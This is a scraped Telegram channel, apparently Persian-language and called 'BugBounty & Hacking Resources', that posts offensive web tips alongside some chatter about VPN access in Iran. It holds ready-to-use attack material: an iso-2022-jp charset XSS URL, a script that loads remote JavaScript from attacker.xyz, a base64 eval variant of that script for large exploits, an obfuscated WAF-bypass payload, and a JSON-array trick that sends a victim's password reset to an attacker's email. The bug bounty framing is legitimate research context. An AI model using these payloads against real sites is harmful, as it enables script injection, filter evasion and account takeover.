BugBounty & Hacking Resources
این کاربردش کجاس(ff): اگه تو هدر یا متا تگ charset تعریف ولی ست نشده باشه یا مقدارش اشتباه باشه تو (chrome) به نظر باید حتما: iso-2022-jp باشه
برای کروم هم میشه(حتی اگرم charset نباشه یا الکی باشه):
https://portswigger-labs.net/xss/charset.php?x=%1B%1B%3Ca%20href=javas%1B(Jcript:alert(1)%3Etest%3C/a%3E&charset=
https://portswigger-labs.net/xss/charset.php?x=%1B%1B%3Ca%20href=javas%1B(Jcript:alert(1)%3Etest%3C/a%3E&charset=
BugBounty & Hacking Resources
Photo
This media is not supported in your browser
VIEW IN TELEGRAM
🤣10
BugBounty & Hacking Resources
👋
هر 1 روز در ایران == زوال عقل بیشتر
الانم که وضع vpn ها بدترم شده😩
بیشتر انرژیمون فقط سره connect بودنه
الانم که وضع vpn ها بدترم شده
بیشتر انرژیمون فقط سره connect بودنه
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
noscriptElement = document.createElement('noscript');
noscriptElement.src = 'https://attacker.xyz/path_to_file.js';
document.head.appendChild(noscriptElement);اگه خواستید js رو از سایتتون لود کنید. برای شرایطی که کد اکسپلویت گنده بود.
و اینکه میتونید همینو base64 کنید که اذیت نشید. مثلا:
<img src=1 onerror="x=atob`c2NyaXB0RWxlbWVudCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOwpzY3JpcHRFbGVtZW50LnNyYyA9ICdodHRwczovL2F0dGFja2VyLnh5ei9wYXRoX3RvX2ZpbGUuanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdEVsZW1lbnQpOw`;eval(x)">
تو سورس پابلیک زیاد گفتنش, ولی خب اینجا میذارم چون کاربردیه
#xss
👍5❤1
Uppercase XSS and WAF bypass:
AAA=![],BBB=!![],IIII=[][[]],OOO=+[![]],SI=+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]]),ST=([]+[]),UUU=(+[]),A=(AAA+"")[1],D=(IIII+"")[2],E=(BBB+"")[3],F=(AAA+"")[0],G=[![]+[+[]]+[[]+[]][+[]][[![]+{}][+[]][+!+[]+[+[]]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[![]+{}][+[]][+!+[]+[+[]]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]][+[]][!+[]+!+[]+[+[]]],I=([AAA]+IIII)[10],L=(AAA+"")[2],T=(BBB+"")[0],O=(BBB+[][F+I+L+L])[10],R=(BBB+"")[1],N=(IIII+"")[1],M=(+(208))[T+O+"S"+T+R+I+N+G](31)[1],P=(+(211))[T+O+"S"+T+R+I+N+G](31)[1],S=(AAA+"")[3],U=(IIII+"")[0],V=(+(31))[T+O+"S"+T+R+I+N+G](32),X=(+(101))[T+O+"S"+T+R+I+N+G](34)[1],Y=(OOO+[SI])[10],Z=(+(35))[T+O+"S"+T+R+I+N+G](36),C=([][F+I+L+L]+"")[3],H=(+(101))[T+O+"S"+T+R+I+N+G](21)[1],K=(+(20))[T+O+"S"+T+R+I+N+G](21),W=(+(32))[T+O+"S"+T+R+I+N+G](33),J=([][E+N+T+R+I+E+S]()+"")[3],B=([][E+N+T+R+I+E+S]()+"")[2],HH=A+L+E+R,YH=T,RR="(",LG=")",ORIGIN=O+R+I+G+I+N,XX=HH+YH+RR+ORIGIN+LG,[][F+I+L+L][C+O+N+S+T+R+U+C+T+O+R](XX)()🔥12👍2 2
Forwarded from ᴊᴀʟᴀʟ
اینجا یک لیست از رایت هایی که حتما باید خونده بشه + جاهایی که میتونی دنبال رایت اپ هتی بیشتر بگردی هست
https://github.com/Voorivex/bb-resouces
https://github.com/Voorivex/bb-resouces
❤8
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣8
❤2👍1
In the RESET-PASSWORD process, if the request's JSON allows adding values like an array:
it could be exploited to send the reset password link/code to an attacker's email, making it easy to take over the account.✅
{"email":["victim@test.com","attacker@test.com"]}it could be exploited to send the reset password link/code to an attacker's email, making it easy to take over the account.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
❤4🔥1